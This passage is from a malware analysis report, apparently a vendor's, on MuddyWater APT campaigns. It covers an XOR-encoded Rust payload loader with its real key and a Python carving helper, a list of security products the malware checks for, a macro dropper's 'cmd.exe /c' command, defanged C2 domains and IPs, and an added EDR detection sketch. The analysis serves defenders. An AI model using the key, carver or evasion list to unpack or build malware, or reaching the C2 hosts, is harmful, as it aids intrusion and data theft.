The generated "PhotoAcq.log" file contains an icon resource associated with the US security vendor SentinelOne, and includes an internal path reference to "phoenix.pdb".
C:\Users\win10\Desktop\phonix\phoenix\x64\Release\phoenix.pdb
[Figure 3-19] "PhotoAcq.log" File Information
When executed, the "PhotoAcq.log" malware uses loader logic to load a payload (PE) hidden in the .rdata section into memory. The .rdata section contains 1,308,672 bytes (0x13F800) of encrypted data stored contiguously, and the data is not present in plaintext but is XOR-encoded.
The malware copies this data into a dynamically allocated memory region and then performs a follow-on decryption routine.
During decryption, it iterates sequentially over the entire input buffer and applies a fixed 32-byte XOR key repeatedly to each byte. The key index is calculated using the i % 0x20 operation, ensuring that the XOR key window remains limited to 32 bytes.
The XOR key is stored as a plaintext string, and the key value used for decryption is "jfdghkjfdgklhjdfhgsfd09g9045jlkd".
After decryption completes, the restored Rust-based payload executes in memory. Rust is a systems programming language that emphasizes memory safety while compiling to native code. After that, the malware carries out its final malicious actions.
[Figure 3-20] Analysis of the Payload Hidden in "PhotoAcq.log"
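As an added example (not code from the report or from the loader), this Python helper carves the encoded second stage out of a loader's .rdata section using the key and the i % 0x20 window described above; the section-table walk is standard PE layout, and the sample blob it runs on is constructed.

```python
"""
Added analyst helper; not code from the Genians report or from the PhotoAcq.log loader.
Carves the XOR-encoded second stage out of the loader's .rdata section using the
32-byte key and the i % 0x20 key-window scheme described in the report. The
section-table walk and MZ/PE check follow standard PE layout; the sample blob is constructed.
"""
import struct

XOR_KEY = b"jfdghkjfdgklhjdfhgsfd09g9045jlkd"   # 32 bytes, so i % 0x20 == i % len(key)
ENCODED_SIZE = 0x13F800                         # 1,308,672 bytes, as reported


def xor_decrypt(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR byte i with key[i % len(key)], i counted from the start of the buffer."""
    n = len(key)
    return bytes(b ^ key[i % n] for i, b in enumerate(data))


def is_pe(buf: bytes) -> bool:
    """MZ signature plus an e_lfanew that lands on 'PE\\0\\0'."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def section_table(pe: bytes):
    """Yield (name, raw_offset, raw_size) for each IMAGE_SECTION_HEADER in the file."""
    if not is_pe(pe):
        raise ValueError("not a PE file")
    coff = struct.unpack_from("<I", pe, 0x3C)[0] + 4      # IMAGE_FILE_HEADER after "PE\0\0"
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                          # headers follow the optional header
    for i in range(num_sections):
        off = table + i * 40                              # each header is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        yield name, raw_ptr, raw_size


def find_encoded_pe(blob: bytes, key: bytes = XOR_KEY, probe: int = 0x400):
    """
    Offset in blob at which XOR-decoding with the key index restarting at 0 (the
    loader copies the data out before decrypting) yields a PE header, else None.
    """
    for off in range(len(blob) - 1):
        # Two-byte pre-check for 'M','Z' before decoding a whole probe window.
        if blob[off] ^ key[0] != 0x4D or blob[off + 1] ^ key[1] != 0x5A:
            continue
        if is_pe(xor_decrypt(blob[off:off + probe], key)):
            return off
    return None


def carve_payload(loader: bytes, key: bytes = XOR_KEY, section: str = ".rdata",
                  size: int = ENCODED_SIZE):
    """Return the decoded second-stage PE found inside the named section, or None."""
    for name, raw_ptr, raw_size in section_table(loader):
        if name != section:
            continue
        sect = loader[raw_ptr:raw_ptr + raw_size]
        off = find_encoded_pe(sect, key)
        if off is not None:
            return xor_decrypt(sect[off:off + size], key)
    return None


def build_sample_blob():
    """Constructed test data: filler, an XOR-encoded stub PE header, filler. Not a real sample."""
    stub = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0" + bytes(0x3C)
    filler = b"\xAA" * 100
    return filler + xor_decrypt(stub, XOR_KEY) + filler, len(filler), stub   # XOR is symmetric


if __name__ == "__main__":
    blob, expected, _ = build_sample_blob()
    print("encoded PE found at offset", find_encoded_pe(blob), "expected", expected)
```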
The payload checks whether any of 28 security products are installed, including Cylance, SentinelOne, VMware Carbon Black, and CrowdStrike Falcon.
[Figure 3-21] Security Product List
The list of anti-malware vendors enumerated by this malware is as follows:
Microsoft Defender, Avast, AVG, Avira, Bitdefender, Kaspersky, ESET, McAfee, Norton, Trend Micro, Sophos, Malwarebytes, Panda Security, F-Secure, Comodo, Webroot, Cylance, SentinelOne, VMware Carbon Black, CrowdStrike, G DATA, Qihoo 360, K7 Computing, Quick Heal, Doctor Web, Check Point, BullGuard, Emsisoft
[Table 3-2] Anti-Malware Program List
When executed, the malware operates in a specific sequence: it verifies the user account using whoami.exe, gathers system identification information via hostname.exe, and finally assesses network status and connectivity through nslookup.exe.
It also creates an SSPI (Security Support Provider Interface) based TLS security context and passes the C2 server domain during the InitializeSecurityContextW call sequence.
stratioai[.]org (159.198.68[.]25) [US]
It then establishes an encrypted HTTPS session through the TLS handshake and performs C2 communications. During this process, system information or user-related data can be transmitted externally, which can lead to personal data exposure and additional threats.
Although the domain is encrypted on the network, it exists in plaintext in memory during the TLS initialization stage.
[Figure 3-22] C2 Domain Analysis
4. Analysis of Recent Attack Cases in 2026
4-1. Case: Attack Disguised as Cybersecurity Guidelines
The spear-phishing attack carried out on January 5, 2026 was distributed using a sender address associated with a domain used by a state-owned mobile network operator in Turkmenistan.
[Figure 4-1] Attack Disguised as Cybersecurity Guidelines
The threat actor impersonated a state-backed telecommunications provider in Central Asia to increase the sender’s credibility and prompt recipients to mistake the message for a legitimate notice from a public-sector or telecommunications infrastructure related organization.
The email subject line was "New Cybersecurity Guidelines." This is analyzed as a social engineering tactic designed to frame the message as a recent security policy update or the distribution of new guidelines, thereby exploiting the recipient's sense of professional relevance and urgency.
The email body used a brief line such as “Please refer to the attached document for details,” prompting recipients to open the attachment without fully verifying the sender or the document’s legitimacy.
The attached MS Word document, "Cybersecurity.doc", was a malicious file disguised as a legitimate security-related document and displayed a lure screen designed to prompt macro execution.
[Figure 4-2] "Cybersecurity.doc" Execution Screen
The VBA macro embedded in the MS Word document was configured to run automatically when the document was opened and acted as a dropper that created and executed a malicious payload. It operated through the Document_Open event, triggering the malicious logic immediately upon opening the document without additional user actions.
First, the macro read hex-encoded data stored in a text box within a UserForm that was not visible to the user, converted it into binary data, and wrote it to a file at "C:\ProgramData\CertificationKit.ini".
Because the actual payload was hidden within the form object rather than in the main VBA code body, the document was structured to make it difficult to identify the malicious behavior through static analysis. The macro then created a WScript.Shell COM object using a string obfuscation technique and used it to set up an external command execution environment.
The execution command was also constructed by combining numeric arrays with character conversion functions. It ultimately invoked the command "cmd.exe /c CertificationKit.ini" to run the file. The command was configured to run without displaying a console window, making it difficult for the user to notice the execution.
The "Cybersecurity.doc" document showed a highly similar structure and execution flow to the "Webinar.doc" malicious document previously observed in the attack case targeting an Israel-based IT service provider.
The generated "CertificationKit.ini" file was a 64-bit EXE executable and used a Cloudflare icon. Its original filename was set to "reddit.exe", and it was built in Rust, consistent with earlier samples.
nomercys.it[.]com (159.198.66[.]153) [US]
[Figure 4-3] C2 Analysis of the Rust-Based Payload
The C2 server used the domain "nomercys.it[.]com". It collected information such as installed security products from infected systems and served as a communication channel for delivering additional commands or payloads.
Based on these findings, the MuddyWater APT group continues to employ tactics that use DOC file-based VBA macros as an initial intrusion vector, while leveraging Rust-based malicious payloads to conduct reconnaissance and information gathering on compromised systems.
5. Conclusion
5-1. Attack Patterns and Threat Assessment
The MuddyWater APT group operates primarily across the Middle East, conducting long-term, campaign-style attacks against various industries. They are assessed as a strategic threat whose core objectives are long-term infiltration and intelligence gathering rather than short-term disruption.
Even as their targets and timing shift, their attacks maintain tactical consistency by exploiting legitimate business environments and user trust.
5-2. Key Attack Techniques and Limitations
The threat actor abuses legitimate RMM remote administration tools and uses VBA macros in MS Word documents as an initial access method.
Recent activity has also shown the use of Rust-based malicious executables as payloads.
5-3. Necessity of an EDR-Centered Response Strategy
Accordingly, responding to MuddyWater APT requires moving beyond isolated defenses limited to email or document security. Organizations need to strengthen EDR-based endpoint behavioral detection as a core pillar of their security posture to identify post-document execution activity flows and the abnormal use of legitimate tools.
Genian Insights E, Genians’ integrated endpoint security platform, immediately identifies and alerts on anomalous behavior through endpoint behavior-based detection (EDR).
EDR monitors abnormal executable creation and drop behavior on endpoints following VBA macro execution and detects suspicious activity based on the relationship between the document process ("WINWORD.EXE") and the generated executable ("CertificationKit.ini").
[Figure 5-1] XBA Detection View of Anomalous Behavior in the Document Process
It also provides endpoint-level visibility into post-compromise network connection attempts to external C2 servers, including abnormal destinations and periodic communication patterns.
[Figure 5-2] Network Communication View of Files Created by Office
In addition, it distinguishes and detects cmd.exe based command execution, system information collection, and environment enumeration used during the reconnaissance stage from normal user activity, enabling correlation analysis across the full attack sequence.
[Figure 5-3] Detection View of Anomalous System Information Collection Attempts
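As an added example (a detection sketch, not Genians' product logic and not code from the report), the following Python correlates the behaviours just described: an Office process writes a file, that file is executed directly or through "cmd.exe /c", and whoami, hostname and nslookup follow from the same process tree. The event schema and the sample events are constructed.

```python
"""
Added detection sketch; not Genians' product logic and not code from the report.
Correlates what the report says an EDR should tie together: Office writes a file,
that file runs (directly or via "cmd.exe /c"), and whoami / hostname / nslookup
follow under the same process tree. Event schema and sample events are constructed.
"""
from dataclasses import dataclass

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
RECON_TOOLS = {"whoami.exe", "hostname.exe", "nslookup.exe"}
DATA_EXT = (".log", ".ini", ".txt", ".dat")   # never a legitimate process image


@dataclass
class Event:
    ts: int            # seconds, constructed clock
    kind: str          # "proc" (process created) or "file" (file written)
    pid: int           # created process, or the writing process for "file"
    image: str
    ppid: int = 0
    cmdline: str = ""
    target: str = ""   # path written, for "file" events


def base(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events, window: int = 300):
    """Return [(rule, ts, detail)] over events sorted by time."""
    alerts, procs, dropped, recon = [], {}, set(), {}
    for e in sorted(events, key=lambda x: x.ts):
        if e.kind == "file":
            if base(e.image) in OFFICE:
                dropped.add(e.target.lower())      # provenance: an Office process wrote this path
            continue
        procs[e.pid] = e
        img, image_l, cmd = base(e.image), e.image.lower(), e.cmdline.lower()
        # Rule 1: an Office-written file runs, as its own image or as a cmd.exe /c target.
        # Parent-child alone would miss a launch through WMI Win32_Process (Webinar.doc case).
        if image_l in dropped or any(p in cmd for p in dropped):
            alerts.append(("office-dropped-file-executed", e.ts, e.cmdline))
        # Rule 2: a data-extension file (.log, .ini, ...) is executed at all.
        if image_l.endswith(DATA_EXT) or (img == "cmd.exe" and
                                          any(t.endswith(DATA_EXT) for t in cmd.split())):
            alerts.append(("data-extension-executed", e.ts, e.cmdline))
        # Rule 3: whoami + hostname + nslookup under one root process within `window` seconds.
        if img in RECON_TOOLS:
            root = e.pid
            while procs[root].ppid in procs and procs[root].ppid != root:
                root = procs[root].ppid
            seen = recon.setdefault(root, {})
            seen[img] = e.ts
            if RECON_TOOLS.issubset(seen) and max(seen.values()) - min(seen.values()) <= window:
                alerts.append(("recon-sequence", e.ts, f"root pid {root} ran {sorted(seen)}"))
                recon.pop(root)
    return alerts


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
DROP = r"C:\ProgramData\CertificationKit.ini"
SAMPLE_EVENTS = [  # constructed, modelled on the Cybersecurity.doc chain in the report
    Event(0, "proc", 100, WORD, 1, "WINWORD.EXE Cybersecurity.doc"),
    Event(5, "file", 100, WORD, target=DROP),
    Event(6, "proc", 200, r"C:\Windows\System32\cmd.exe", 100, f"cmd.exe /c {DROP}"),
    Event(7, "proc", 300, DROP, 200, DROP),
    Event(8, "proc", 301, r"C:\Windows\System32\whoami.exe", 300, "whoami.exe"),
    Event(9, "proc", 302, r"C:\Windows\System32\hostname.exe", 300, "hostname.exe"),
    Event(10, "proc", 303, r"C:\Windows\System32\nslookup.exe", 300, "nslookup.exe example.invalid"),
    # Benign noise: an admin running whoami from a plain shell must not trip rule 3.
    Event(60, "proc", 400, r"C:\Windows\System32\cmd.exe", 1, "cmd.exe"),
    Event(61, "proc", 401, r"C:\Windows\System32\whoami.exe", 400, "whoami.exe"),
]


def rule_counts(events=SAMPLE_EVENTS):
    counts = {}
    for rule, _, _ in detect(events):
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```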
Without endpoint-level, behavior-based visibility and correlation analysis capabilities, identifying MuddyWater APT attacks at an early stage is difficult in practice.
Post-document execution activities such as file creation, process execution, command execution, and network communication may appear legitimate when viewed in isolation. From the perspective of attack progression, however, they show clear relationships and recur in a staged manner.
For these reasons, EDR serves as a core security capability by analyzing not just individual events but the overall behavioral flow on the endpoint and relationships between processes. This enables early identification of the full attack chain, from document-based initial access through internal reconnaissance and external communications, and supports response before the compromise spreads.
6. IoC (Indicator of Compromise)
MD5
C2
stratioai[.]org
159.198.68[.]25
nomercys.it[.]com
159.198.66[.]153